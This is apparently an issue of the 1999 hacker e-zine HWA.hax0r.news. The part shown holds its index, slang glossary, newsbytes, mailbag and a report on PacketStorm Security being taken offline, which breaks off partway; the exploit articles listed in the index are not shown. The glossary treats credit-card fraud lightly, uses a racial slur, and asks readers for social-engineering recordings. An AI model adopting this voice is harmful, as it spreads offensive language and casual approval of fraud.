HUSTLER LOGIN THEIF BY EGODEATH

[ 28 63 29 20 31 39 39 39 20 63 72 75 63 69 70 68 75 78 20 68 77 61 ] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-= ========================================================================== = <=-[ HWA.hax0r.news ]-=> = ========================================================================== [=HWA'99=] Number 23 Volume 1 1999 July 4th 99 ========================================================================== [ 61:20:6B:69:64:20:63:6F:75: ] [ 6C:64:20:62:72:65:61:6B:20:74:68:69:73: ] [ 20:22:65:6E:63:72:79:70:74:69:6F:6E:22:! ] ========================================================================== "I have received more death threats in the last 24 hours by phone, than I have in five years," - John Vranesevich aka JP (AntiOnline) HWA.hax0r.news is sponsored by Cubesoft communications www.csoft.net and www.digitalgeeks.com thanks to p0lix for the digitalgeeks bandwidth and airportman for the Cubesoft bandwidth. Also shouts out to all our mirror sites! tnx guys. http://www.csoft.net/~hwa http://www.digitalgeeks.com/hwa HWA.hax0r.news Mirror Sites: ~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.csoft.net/~hwa/ http://www.digitalgeeks.com/hwa. http://members.tripod.com/~hwa_2k http://welcome.to/HWA.hax0r.news/ http://www.attrition.org/~modify/texts/zines/HWA/ http://packetstorm.harvard.edu/hwahaxornews/ * DOWN * http://archives.projectgamma.com/zines/hwa/. http://www.403-security.org/Htmls/hwa.hax0r.news.htm SYNOPSIS (READ THIS) -------------------- The purpose of this newsletter is to 'digest' current events of interest that affect the online underground and netizens in general. This includes coverage of general security issues, hacks, exploits, underground news and anything else I think is worthy of a look see. (remember i'm doing this for me, not you, the fact some people happen to get a kick/use out of it is of secondary importance). This list is NOT meant as a replacement for, nor to compete with, the likes of publications such as CuD or PHRACK or with news sites such as AntiOnline, the Hacker News Network (HNN) or mailing lists such as BUGTRAQ or ISN nor could any other 'digest' of this type do so. It *is* intended however, to compliment such material and provide a reference to those who follow the culture by keeping tabs on as many sources as possible and providing links to further info, its a labour of love and will be continued for as long as I feel like it, i'm not motivated by dollars or the illusion of fame, did you ever notice how the most famous/infamous hackers are the ones that get caught? there's a lot to be said for remaining just outside the circle... @HWA =-----------------------------------------------------------------------= Welcome to HWA.hax0r.news ... #23 =-----------------------------------------------------------------------= We could use some more people joining the channel, its usually pretty quiet, we don't bite (usually) so if you're hanging out on irc stop by and idle a while and say hi... ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** *** *** *** please join to discuss or impart news on techno/phac scene *** *** stuff or just to hang out ... someone is usually around 24/7*** *** *** *** Note that the channel isn't there to entertain you its for *** *** you to talk to us and impart news, if you're looking for fun*** *** then do NOT join our channel try #weirdwigs or something... *** *** we're not #chatzone or #hack *** *** *** ******************************************************************* =-------------------------------------------------------------------------= Issue #23 =--------------------------------------------------------------------------= [ INDEX ] =--------------------------------------------------------------------------= Key Intros =--------------------------------------------------------------------------= 00.0 .. COPYRIGHTS ...................................................... 00.1 .. CONTACT INFORMATION & SNAIL MAIL DROP ETC ....................... 00.2 .. SOURCES ......................................................... 00.3 .. THIS IS WHO WE ARE .............................................. 00.4 .. WHAT'S IN A NAME? why `HWA.hax0r.news'?.......................... 00.5 .. THE HWA_FAQ V1.0 ................................................ =--------------------------------------------------------------------------= Key Content =--------------------------------------------------------------------------= 01.0 .. GREETS .......................................................... 01.1 .. Last minute stuff, rumours, newsbytes ........................... 01.2 .. Mailbag ......................................................... 02.0 .. From the Editor.................................................. AA.A .. SPECIAL: AntiOnline's JP pulls the plug on PacketStorm Security 03.0 .. Cable Modem Hijacking from www.hackcanada.com.................... 04.0 .. Exploiting Null Session Weaknesses in NT environment............. 05.0 .. Cognos PowerPlay Web Edition security vunerability allows access to data cubes.. 06.0 .. VMware Security Alert............................................ 07.0 .. Security vulnerability in hustler.com login template ............ 08.0 .. DOD investigating computer 'Mob-like' tactics.................... 09.0 .. GSA announces Intrusion Detection Net............................ 10.0 .. Nasa servers reportedly hacked................................... 11.0 .. UK May Force ISPs to Install Taps................................ 12.0 .. Crypto Tie Downs Loosened ....................................... 13.0 .. Heathen.A Spreads Through Word Files ........................... 14.0 .. $950 for a Log File Analysis Tool ............................... 15.0 .. Youth Charged With $20,000 in Damages ........................... 16.0 .. Army Fights Online Battle And Looses ............................ 17.0 .. Welfare Reform Law Invades Privacy of US Citizens .............. 18.0 .. GSM Mobile Security is Cracked .................................. 19.0 .. Microsoft Mono-culture Poses National Security Risk ............. 20.0 .. BugTraq Moves To SecurityFocus .................................. 21.0 .. MS Gives Out Pirate Dough ....................................... 22.0 .. Biometrics comes to Home Shopping ............................... 23.0 .. Palm VII Revealed ............................................... 24.0 .. Who Is HNN? ..................................................... 25.0 .. AntiOnline on the trail of f0rpaxe............................... 26.0 .. Critical NOAA Web Site Attacked ................................. 27.0 .. Back Orifice 2000 is on its Way ................................. 28.0 .. Support for Web Security Spec Announced ......................... 29.0 .. Pentagon Investigates Computer Security Breech .................. 30.0 .. What will the Next Generation of Viruses Bring? ................. 31.0 .. DIRT still Around, Used by LAw Enforcement ...................... 32.0 .. Debit Cards Not Safe on the Internet ............................ 33.0 .. New Definition of 'Computer Hacker' ............................. 34.0 .. Hackers In the Workplace ........................................ 35.0 .. NPR Covers .gov/.mil Defacements. ............................... 36.0 .. Australia Passes Major Net Censorship Law ....................... 37.0 .. Hacker crackdown, is your nick on this list?? ................... =--------------------------------------------------------------------------= RUMOURS .Rumours from around and about, mainly HNN stuff (not hacked websites) AD.S .. Post your site ads or etc here, if you can offer something in return thats tres cool, if not we'll consider ur ad anyways so send it in. ads for other zines are ok too btw just mention us in yours, please remember to include links and an email contact. Corporate ads will be considered also and if your company wishes to donate to or participate in the upcoming Canc0n99 event send in your suggestions and ads now...n.b date and time may be pushed back join mailing list for up to date information....................................... Current dates: Aug19th-22nd Niagara Falls... ................. HA.HA .. Humour and puzzles ............................................ Hey You!........................................................ =------=........................................................ Send in humour for this section! I need a laugh and its hard to find good stuff... ;)........................................... SITE.1 .. Featured site, ................................................. H.W .. Hacked Websites ............................................... A.0 .. APPENDICES...................................................... A.1 .. PHACVW linx and references...................................... =--------------------------------------------------------------------------= @HWA'99 00.0 (C) COPYRIGHT, (K)OPYWRONG, COPYLEFT? V2.0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ THE OPINIONS OF THE WRITERS DO NOT NECESSARILY REFLECT THE OPINIONS OF THE PUBLISHERS AND VICE VERSA IN FACT WE DUNNO WTF IS GONNA TAKE RESPONSIBILITY FOR THIS, I'M NOT DOING IT (LOTS OF ME EITHER'S RESOUND IN THE BACKGROUND) SO UHM JUST READ IT AND IF IT BUGS YOU WELL TFS (SEE FAQ). Important semi-legalese and license to redistribute: YOU MAY DISTRIBUTE THIS ZINE WITHOUT PERMISSION FROM MYSELF AND ARE GRANTED THE RIGHT TO QUOTE ME OR THE CONTENTS OF THE ZINE SO LONG AS Cruciphux AND/OR HWA.hax0r.news ARE MENTIONED IN YOUR WRITING. LINK'S ARE NOT NECESSARY OR EXPECTED BUT ARE APPRECIATED the current link is http://welcome.to/HWA.hax0r.news IT IS NOT MY INTENTION TO VIOLATE ANYONE'S COPYRIGHTS OR BREAK ANY NETIQUETTE IN ANY WAY IF YOU FEEL I'VE DONE THAT PLEASE EMAIL ME PRIVATELY current email cruciphux@dok.org THIS DOES NOT CONSTITUTE ANY LEGAL RIGHTS, IN THIS COUNTRY ALL WORKS ARE (C) AS SOON AS COMMITTED TO PAPER OR DISK, IF ORIGINAL THE LAYOUT AND COMMENTARIES ARE THEREFORE (C) WHICH MEANS: I RETAIN ALL RIGHTS, BUT I GIVE YOU THE RIGHT TO READ, QUOTE AND REDISTRIBUTE/MIRROR. - EoD Although this file and all future issues are now copyright, some of the content holds its own copyright and these are printed and respected. News is news so i'll print any and all news but will quote sources when the source is known, if its good enough for CNN its good enough for me. And i'm doing it for free on my own time so pfffft. :) No monies are made or sought through the distribution of this material. If you have a problem or concern email me and we'll discuss it. cruciphux@dok.org Cruciphux [C*:.] 00.1 CONTACT INFORMATION AND MAIL DROP ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Wahoo, we now have a mail-drop, if you are outside of the U.S.A or Canada / North America (hell even if you are inside ..) and wish to send printed matter like newspaper clippings a subscription to your cool foreign hacking zine or photos, small non-explosive packages or sensitive information etc etc well, now you can. (w00t) please no more inflatable sheep or plastic dog droppings, or fake vomit thanks. Send all goodies to: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 WANTED!: POSTCARDS! YESH! POSTCARDS, I COLLECT EM so I know a lot of you are ~~~~~~~ reading this from some interesting places, make my day and get a mention in the zine, send in a postcard, I realize that some places it is cost prohibitive but if you have the time and money be a cool dude / gal and send a poor guy a postcard preferably one that has some scenery from your place of residence for my collection, I collect stamps too so you kill two birds with one stone by being cool and mailing in a postcard, return address not necessary, just a "hey guys being cool in Bahrain, take it easy" will do ... ;-) thanx. Ideas for interesting 'stuff' to send in apart from news: - Photo copies of old system manual front pages (optionally signed by you) ;-) - Photos of yourself, your mom, sister, dog and or cat in a NON compromising position plz I don't want pr0n. - Picture postcards - CD's 3.5" disks, Zip disks, 5.25" or 8" floppies, Qic40/80/100-250 tapes with hack/security related archives, logs, irc logs etc on em. - audio or video cassettes of yourself/others etc of interesting phone fun or social engineering examples or transcripts thereof. If you still can't think of anything you're probably not that interesting a person after all so don't worry about it Our current email: Submissions/zine gossip.....: hwa@press.usmc.net Private email to editor.....: cruciphux@dok.org Distribution/Website........: sas72@usa.net @HWA 00.2 Sources *** ~~~~~~~~~~~ Sources can be some, all, or none of the following (by no means complete nor listed in any degree of importance) Unless otherwise noted, like msgs from lists or news from other sites, articles and information is compiled and or sourced by Cruciphux no copyright claimed. News & I/O zine ................. http://www.antionline.com/ Back Orifice/cDc..................http://www.cultdeadcow.com/ News site (HNN) .....,............http://www.hackernews.com/ Help Net Security.................http://net-security.org/ News,Advisories,++ ...............http://www.l0pht.com/ NewsTrolls .......................http://www.newstrolls.com/ News + Exploit archive ...........http://www.rootshell.com/beta/news.html CuD Computer Underground Digest...http://www.soci.niu.edu/~cudigest News site+........................http://www.zdnet.com/ News site+Security................http://www.gammaforce.org/ News site+Security................http://www.projectgamma.com/ News site+Security................http://securityhole.8m.com/ News site+Security related site...http://www.403-security.org/ News/Humour site+ ................http://www.slashdot.org +Various mailing lists and some newsgroups, such as ... +other sites available on the HNN affiliates page, please see http://www.hackernews.com/affiliates.html as they seem to be popping up rather frequently ... http://www.the-project.org/ .. IRC list/admin archives http://www.anchordesk.com/ .. Jesse Berst's AnchorDesk alt.hackers.malicious alt.hackers alt.2600 BUGTRAQ ISN security mailing list ntbugtraq <+others> NEWS Agencies, News search engines etc: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ http://www.cnn.com/SEARCH/ Link http://www.foxnews.com/search/cgi-bin/search.cgi?query=hack&days=0&wires=0&startwire=0 Link http://www.news.com/Searching/Results/1,18,1,00.html?querystr=hack Link http://www.ottawacitizen.com/business/ Link http://search.yahoo.com.sg/search/news_sg?p=hack Link http://www.washingtonpost.com/cgi-bin/search?DB_NAME=WPlate&TOTAL_HITLIST=20&DEFAULT_OPERATOR=AND&headline=&WITHIN_FIELD_NAME=.lt.event_date&WITHIN_DAYS=0&description=hack Link http://www.zdnet.com/zdtv/cybercrime/ Link http://www.zdnet.com/zdtv/cybercrime/chaostheory/ (Kevin Poulsen's Column) Link NOTE: See appendices for details on other links. http://news.bbc.co.uk/hi/english/sci/tech/newsid_254000/254236.stm Link http://freespeech.org/eua/ Electronic Underground Affiliation Link http://ech0.cjb.net ech0 Security Link http://axon.jccc.net/hir/ Hackers Information Report Link http://net-security.org Net Security Link http://www.403-security.org Daily news and security related site Link Submissions/Hints/Tips/Etc ~~~~~~~~~~~~~~~~~~~~~~~~~~ All submissions that are `published' are printed with the credits you provide, if no response is received by a week or two it is assumed that you don't care wether the article/email is to be used in an issue or not and may be used at my discretion. Looking for: Good news sites that are not already listed here OR on the HNN affiliates page at http://www.hackernews.com/affiliates.html Magazines (complete or just the articles) of breaking sekurity or hacker activity in your region, this includes telephone phraud and any other technological use, abuse hole or cool thingy. ;-) cut em out and send it to the drop box. - Ed Mailing List Subscription Info (Far from complete) Feb 1999 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~ ~~~~~~~~ ISS Security mailing list faq : http://www.iss.net/iss/maillist.html THE MOST READ: BUGTRAQ - Subscription info ~~~~~~~~~~~~~~~~~~~~~~~~~~~ What is Bugtraq? Bugtraq is a full-disclosure UNIX security mailing list, (see the info file) started by Scott Chasin . To subscribe to bugtraq, send mail to listserv@netspace.org containing the message body subscribe bugtraq. I've been archiving this list on the web since late 1993. It is searchable with glimpse and archived on-the-fly with hypermail. Searchable Hypermail Index; http://www.eecs.nwu.edu/~jmyers/bugtraq/index.html Link About the Bugtraq mailing list ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The following comes from Bugtraq's info file: This list is for *detailed* discussion of UNIX security holes: what they are, how to exploit, and what to do to fix them. This list is not intended to be about cracking systems or exploiting their vulnerabilities. It is about defining, recognizing, and preventing use of security holes and risks. Please refrain from posting one-line messages or messages that do not contain any substance that can relate to this list`s charter. I will allow certain informational posts regarding updates to security tools, documents, etc. But I will not tolerate any unnecessary or nonessential "noise" on this list. Please follow the below guidelines on what kind of information should be posted to the Bugtraq list: + Information on Unix related security holes/backdoors (past and present) + Exploit programs, scripts or detailed processes about the above + Patches, workarounds, fixes + Announcements, advisories or warnings + Ideas, future plans or current works dealing with Unix security + Information material regarding vendor contacts and procedures + Individual experiences in dealing with above vendors or security organizations + Incident advisories or informational reporting Any non-essential replies should not be directed to the list but to the originator of the message. Please do not "CC" the bugtraq reflector address if the response does not meet the above criteria. Remember: YOYOW. You own your own words. This means that you are responsible for the words that you post on this list and that reproduction of those words without your permission in any medium outside the distribution of this list may be challenged by you, the author. For questions or comments, please mail me: chasin@crimelab.com (Scott Chasin) Crypto-Gram ~~~~~~~~~~~ CRYPTO-GRAM is a free monthly newsletter providing summaries, analyses, insights, and commentaries on cryptography and computer security. To subscribe, visit http://www.counterpane.com/crypto-gram.html or send a blank message to crypto-gram-subscribe@chaparraltree.com.� To unsubscribe, visit http://www.counterpane.com/unsubform.html.� Back issues are available on http://www.counterpane.com. CRYPTO-GRAM is written by Bruce Schneier.� Schneier is president of Counterpane Systems, the author of "Applied Cryptography," and an inventor of the Blowfish, Twofish, and Yarrow algorithms.� He served on the board of the International Association for Cryptologic Research, EPIC, and VTW.� He is a frequent writer and lecturer on cryptography. CUD Computer Underground Digest ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This info directly from their latest ish: Computer underground Digest�� Sun� 14 Feb, 1999�� Volume 11 : Issue 09 �� ISSN� 1004-042X �� Editor: Jim Thomas (cudigest@sun.soci.niu.edu) �� News Editor: Gordon Meyer (gmeyer@sun.soci.niu.edu) �� Archivist: Brendan Kehoe �� Poof Reader:�� Etaion Shrdlu, Jr. �� Shadow-Archivists: Dan Carosone / Paul Southworth �� Ralph Sims / Jyrki Kuoppala �� Ian Dickinson �� Cu Digest Homepage: http://www.soci.niu.edu/~cudigest [ISN] Security list ~~~~~~~~~~~~~~~~~~~ This is a low volume list with lots of informative articles, if I had my way i'd reproduce them ALL here, well almost all .... ;-) - Ed Subscribe: mail majordomo@repsec.com with "subscribe isn". @HWA 00.3 THIS IS WHO WE ARE ~~~~~~~~~~~~~~~~~~ Some HWA members and Legacy staff ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ cruciphux@dok.org.........: currently active/editorial darkshadez@ThePentagon.com: currently active/man in black fprophet@dok.org..........: currently active/IRC+ man in black sas72@usa.net ............. currently active/IRC+ distribution vexxation@usa.net ........: currently active/IRC+ proof reader/grrl in black dicentra...(email withheld): IRC+ grrl in black Foreign Correspondants/affiliate members ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ N0Portz ..........................: Australia Qubik ............................: United Kingdom system error .....................: Indonesia Wile (wile coyote) ...............: Japan/the East Ruffneck ........................: Netherlands/Holland And unofficially yet contributing too much to ignore ;) Spikeman .........................: World media Please send in your sites for inclusion here if you haven't already also if you want your emails listed send me a note ... - Ed Spikeman's site is down as of this writing, if it comes back online it will be posted here. http://www.hackerlink.or.id/ ............ System Error's site (in Indonesian) ******************************************************************* *** /join #HWA.hax0r.news on EFnet the key is `zwen' *** ******************************************************************* :-p 1. We do NOT work for the government in any shape or form.Unless you count paying taxes ... in which case we work for the gov't in a BIG WAY. :-/ 2. MOSTLY Unchanged since issue #1, although issues are a digest of recent news events its a good idea to check out issue #1 at least and possibly also the Xmas issue for a good feel of what we're all about otherwise enjoy - Ed ... @HWA 00.4 Whats in a name? why HWA.hax0r.news?? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Well what does HWA stand for? never mind if you ever find out I may have to get those hax0rs from 'Hackers' or the Pretorians after you. In case you couldn't figure it out hax0r is "new skewl" and although it is laughed at, shunned, or even pidgeon holed with those 'dumb leet (l33t?) dewds' this is the state of affairs. It ain't Stephen Levy's HACKERS anymore. BTW to all you up and comers, i'd highly recommend you get that book. Its almost like buying a clue. Anyway..on with the show .. - Editorial staff @HWA 00.5 HWA FAQ v1.0 Feb 13th 1999 (Abridged & slightly updated again) ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Also released in issue #3. (revised) check that issue for the faq it won't be reprinted unless changed in a big way with the exception of the following excerpt from the FAQ, included to assist first time readers: Some of the stuff related to personal useage and use in this zine are listed below: Some are very useful, others attempt to deny the any possible attempts at eschewing obfuscation by obsucuring their actual definitions. @HWA - see EoA ;-) != - Mathematical notation "is not equal to" or "does not equal" ASC(247) "wavey equals" sign means "almost equal" to. If written an =/= (equals sign with a slash thru it) also means !=, =< is Equal to or less than and => is equal to or greater than (etc, this aint fucking grade school, cripes, don't believe I just typed all that..) AAM - Ask a minor (someone under age of adulthood, usually <16, <18 or <21) AOL - A great deal of people that got ripped off for net access by a huge clueless isp with sekurity that you can drive buses through, we're not talking Kung-Fu being none too good here, Buy-A-Kloo maybe at the least they could try leasing one?? *CC - 1 - Credit Card (as in phraud) 2 - .cc is COCOS (Keeling) ISLANDS butthey probably accept cc's CCC - Chaos Computer Club (Germany) *CON - Conference, a place hackers crackers and hax0rs among others go to swap ideas, get drunk, swap new mad inphoz, get drunk, swap gear, get drunk watch videos and seminars, get drunk, listen to speakers, and last but not least, get drunk. *CRACKER - 1 . Someone who cracks games, encryption or codes, in popular hacker speak he's the guy that breaks into systems and is often (but by no means always) a "script kiddie" see pheer 2 . An edible biscuit usually crappy tasting without a nice dip, I like jalapeno pepper dip or chives sour cream and onion, yum - Ed Ebonics - speaking like a rastafarian or hip dude of colour also wigger Vanilla Ice is a wigger, The Beastie Boys and rappers speak using ebonics, speaking in a dark tongue ... being ereet, see pheer EoC - End of Commentary EoA - End of Article or more commonly @HWA EoF - End of file EoD - End of diatribe (AOL'ers: look it up) FUD - Coined by Unknown and made famous by HNN - "Fear uncertainty and doubt", usually in general media articles not high brow articles such as ours or other HNN affiliates ;) du0d - a small furry animal that scurries over keyboards causing people to type weird crap on irc, hence when someone says something stupid or off topic 'du0d wtf are you talkin about' may be used. *HACKER - Read Stephen Levy's HACKERS for the true definition, then see HAX0R *HAX0R - 1 - Cracker, hacker wannabe, in some cases a true hacker, this is difficult to define, I think it is best defined as pop culture's view on The Hacker ala movies such as well erhm "Hackers" and The Net etc... usually used by "real" hackers or crackers in a derogatory or slang humorous way, like 'hax0r me some coffee?' or can you hax0r some bread on the way to the table please?' 2 - A tool for cutting sheet metal. HHN - Maybe a bit confusing with HNN but we did spring to life around the same time too, HWA Hax0r News.... HHN is a part of HNN .. and HNN as a proper noun means the hackernews site proper. k? k. ;& HNN - Hacker News Network and its affiliates http://www.hackernews.com/affiliates.html J00 - "you"(as in j00 are OWN3D du0d) - see 0wn3d MFI/MOI- Missing on/from IRC NFC - Depends on context: No Further Comment or No Fucking Comment NFR - Network Flight Recorder (Do a websearch) see 0wn3d NFW - No fuckin'way *0WN3D - You are cracked and owned by an elite entity see pheer *OFCS - Oh for christ's sakes PHACV - And variations of same Phreaking, Hacking, Anarchy, Cracking, Carding (CC) Groups Virus, Warfare Alternates: H - hacking, hacktivist C - Cracking C - Cracking V - Virus W - Warfare A - Anarchy (explosives etc, Jolly Roger's Cookbook etc) P - Phreaking, "telephone hacking" PHone fREAKs ... CT - Cyber Terrorism *PHEER - This is what you do when an ereet or elite person is in your presence see 0wn3d *RTFM - Read the fucking manual - not always applicable since some manuals are pure shit but if the answer you seek is indeed in the manual then you should have RTFM you dumb ass. TBC - To Be Continued also 2bc (usually followed by ellipses...) :^0 TBA - To Be Arranged/To Be Announced also 2ba TFS - Tough fucking shit. *w00t - 1 - Reserved for the uber ereet, noone can say this without severe repercussions from the underground masses. also "w00ten" 2 - Cruciphux and sAs72's second favourite word (they're both shit stirrers) *wtf - what the fuck *ZEN - The state you reach when you *think* you know everything (but really don't) usually shortly after reaching the ZEN like state something will break that you just 'fixed' or tweaked. @HWA -=- :. .: -=- 01.0 Greets!?!?! yeah greets! w0w huh. - Ed ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Thanks to all in the community for their support and interest but i'd like to see more reader input, help me out here, whats good, what sucks etc, not that I guarantee i'll take any notice mind you, but send in your thoughts anyway. * all the people who sent in cool emails and support FProphet Pyra TwstdPair _NeM_ D----Y Kevin Mitnick (watch yer back) Dicentra vexxation sAs72 Spikeman Astral p0lix Vexx g0at security pr0xy Astral Ken Williams/tattooman of PacketStorm, hang in there Ken...:( and the #innerpulse, crew (innerpulse is back!) and some inhabitants of #leetchans .... although I use the term 'leet loosely these days, ;) kewl sites: + http://www.securityfocus.com NEW + http://www.hackcanada.com + http://www.l0pht.com/ + http://www.2600.com/ + http://www.freekevin.com/ + http://www.genocide2600.com/ + http://www.packetstorm.harvard.edu/ ******* DOWN ********* SEE AA.A + http://www.hackernews.com/ (Went online same time we started issue 1!) + http://www.net-security.org/ + http://www.slashdot.org/ + http://www.freshmeat.net/ + http://www.403-security.org/ + http://ech0.cjb.net/ @HWA 01.1 Last minute stuff, rumours and newsbytes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "What is popular isn't always right, and what is right isn't always popular..." - FProphet '99 +++ When was the last time you backed up your important data? ++ Help Net Security is Moving. contributed by BHZ Help-net Security, an HNN Affiliate is moving to a new server. Unfortunately they have encountered a few problems with transferring the domain. So net-security.org could be unfunctional for up to 5 days. In the mean time you can reach HNS at http://hns.crolink.net Help-net Security - Old URL http://net-security.org Help-net Security - New URL http://hns.crolink.net ++ TECHNO BRA CALLS THE COPS (TECH. 3:00 am Jul 1st) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20517.html A security bra monitors the wearer's heart rate to sense danger. When activated, it relays her location to the cops and helps them make a bust. By Leander Kahney. ++ ALLEN BUYS ANOTHER CABLE SHOP (BUS. 9:00 am Jul 1st) http://www.wired.com/news/news/email/explode-infobeat/business/story/20528.html Paul Allen takes another step towards becoming master of his own "wired world" with the US$3.1 billion acquisition of Bresnan Communications, a Midwest cable operator. ++ WAITING FOR WAP (TECH. 3:00 am Jul 1st) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20521.html Supporters say the Wireless Access Protocol promises to bring Web services to tiny cell-phone screens. But when? Chris Oakes reports from San Francisco. ++ APACHE NOW IN GOOD COMPANY (TECH. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20506.html The free Web server that has always had the lion's share of the market now has a corporation behind it. The nonprofit company is being run by Apache's founding fathers. ++ SORRY, WRONG NUMBER (WRLD Wednesday) http://www.wired.com/news/news/email/explode-infobeat/story/20509.html Manhattanites take pride in their 212 area code, a distinctive symbol of living in The Most Important Place on Earth. But starting Thursday, some of them are going to have to adjust to life without 212, when Bell Atlantic begins issuing 646 area codes to new phone subscribers in Manhattan. The move, necessitated by too many phone numbers, is not going down too well, although former New York Mayor Ed Koch expects the grousing to stop after an adjustment period. Besides, residents of Gotham will still hold on to all the other perks that make living there such a joy: astronomical rents, overpriced restaurants, and living cheek-by-jowl with one another. ++ ZEROING IN ON CELL-PHONE 911S (TECH. Wednesday) http://www.wired.com/news/news/email/explode-infobeat/technology/story/20504.html New technology will pinpoint a mobile-phone user's location to within 5 feet -- a potential lifesaver in 911 calls. But watchdogs say the data will inevitably be within the reach of snoops. By Chris Oakes. Mucho thanks to Spikeman for directing his efforts to our cause of bringing you the news we want to read about in a timely manner ... - Ed @HWA 01.2 MAILBAG - email and posts from the message board worthy of a read ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -=- From: "Whimsies & Company" To: Subject: Please support Justice and Free Speech Date: Thu, 1 Jul 1999 19:18:02 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 4.72.3110.5 X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3110.3 Dark Modem DOWN For Emergency ACTION OK, two issues: 1) the following message has been sent to a TARGETED audience. We have walked a thin line between targeted mailing and spam. If we get even one complaint, we will stop. 2) It cannot be confirmed that any unusual activity has occurred on the antionline network in the past 24 hours *grin* therefore we have taken that statement out of the message. Again, we do NOT advocate spamming, we only want people who might be interested in this issue to be aware, so use DISCRETION when sending any mail. This is an emergency email message from Dark Modem (http://www.darkmodem.org). Yesterday (June 30, 1999), Packet Storm Security was taken offline after John Vranesevich sent an email to Harvard University about the JP section that was on the site. Some suspect it was really jealousy and animosity toward Ken Williams that drove JP to commit this offensive act. Packet Storm was in direct competition with antionline and essentially blew antionline out of the water in every category. It is this author's belief, therefore, that JP was trying to protect his "marketshare" (something that Ken Williams would never have done, since he was not in it for money). Please show your support by mentioning this topic on your website, forwarding this email to "whom it may concern", and sending email in support of Ken and PSS to Harvard and antionline. ================================================================ @HWA 02.0 From the editor. ~~~~~~~~~~~~~~~~ #include #include #include main() { printf ("Read commented source!\n\n"); /* *Otay buttwheat, here's #23 it might not be as bulging in the *pantal area as #22 but it should be a little cleaner (or not) *we've had some people coming into the IRC channel on EFNET and *just parting, maybe you're just scanning the nicks, but hey we *don't bite come and hang out, maybe chat about some of the shit *thats going down with Packetstorm or why 2600 is $7.15 in Canada *does Eric hate Canadians or whats the story? * *... who the fuck does JP think he is? fucking with PSS *there goes a ton of Ken's work down the drain...fuck AntiOnline! *(Read section AA.A) * *anyway enjoy this issue and shouts out to HackCanada..and Ken *Williams .. * * */ printf ("EoF.\n"); } Issue #23, rocking your sysadmin and hax0r asses in 99... Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. @HWA AA.A AntiOnline's JP causes the plug to be pulled on PacketStorm by Harvard ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ June 30th AM a Call from John Vranesevich (aka JP) of AntiOnline to Harvard started off an avalanche of events that culminated in the plug being pulled at packetstorm.harvard.edu. Along with personal data it was initially reported that the entire site was lost, this may now not be the case. Included here are statements from JP, Harvard, Ken Williams and stories from Attrition.org, HNN (http://www.hackernews.com) and other sources.... read the sordid story below - Ed (At this time it is uncertain wether Ken does or does not have backups of his PacketStorm site available to him but some people on the net have taken it upon themselves to begin a new mirror and are calling for people that have downloaded from the site to re-upload the files to the following url; http://packetstorm.nl.linux.org/ - Ed ) From: Ken Williams X-Sender: jkwilli2@ultra3-100lez.eos.ncsu.edu To: The Usual Suspects: ; Date: Thu, 1 Jul 1999 02:17:40 -0400 (EDT) -----BEGIN PGP SIGNED MESSAGE----- Hi, I just got off the phone (6/30/99 PM) with one of the Harvard Network managers. John Vranesevich, of www.AntiOnline.com, contacted Harvard this morning and threatened to sue them because of the content in the jp/ directory of the Packet Storm Security web site that was located at http://packetstorm.harvard.edu, and before that at http://packetstorm.genocide2600.com (see www.attrition.org for details about this info). I was told that the situation quickly escalated to the Harvard Office of General Counsel. John Vranesevich claims that I was using the server as a platform to harass and threaten him, his family, and his business. Nothing could be further from the truth. I ran a network security related web site and archive! The result: the server and the web site and it's contents are permanently offline, I have no access to even retrieve anything off of the server, the site known as "Packet Storm Security" is history now. I was told by Leo Donnelly at Harvard, via phone, that ALL of the content AND the backups made are either destroyed, being destroyed now, or will be before I can do anything to prevent it. All 4+ GB of files in the publicly accessible directories, over 45,000 files collected and archived over the years, are gone. There was another 4 GB that was composed of research data, customized IDS, Linux, Apache software, etc too. Harvard is facing a lawsuit from JP, I am facing a lawsuit from JP, and possibly some sort of legal action from Harvard. Harvard seems to be trying to free themselves of any liability, and use me as the fall guy for this whole thing. All agreements with Harvard in the beginning were verbal (with Jeff Gray, the senior sysadmin), so I've got nothing on paper to back up the truth. I've got emails, but I don't have the money or legal defense to counter Harvard, or anybody else for that matter. This has turned really ugly, really quickly, and it is very plausible that I will be facing charges involving "hacking" or computer crimes of some sort, because I "never had a Harvard ID, and thus was not authorized to use their facilities", and I "compromised their security." I guess it doesn't matter that I was contacted by the Senior Sysadmin at Harvard and invited to move my site there. It doesn't matter that the head of Harvard UIS approved of everything. It doesn't matter that he placed the box on a subnet of his choosing and called me 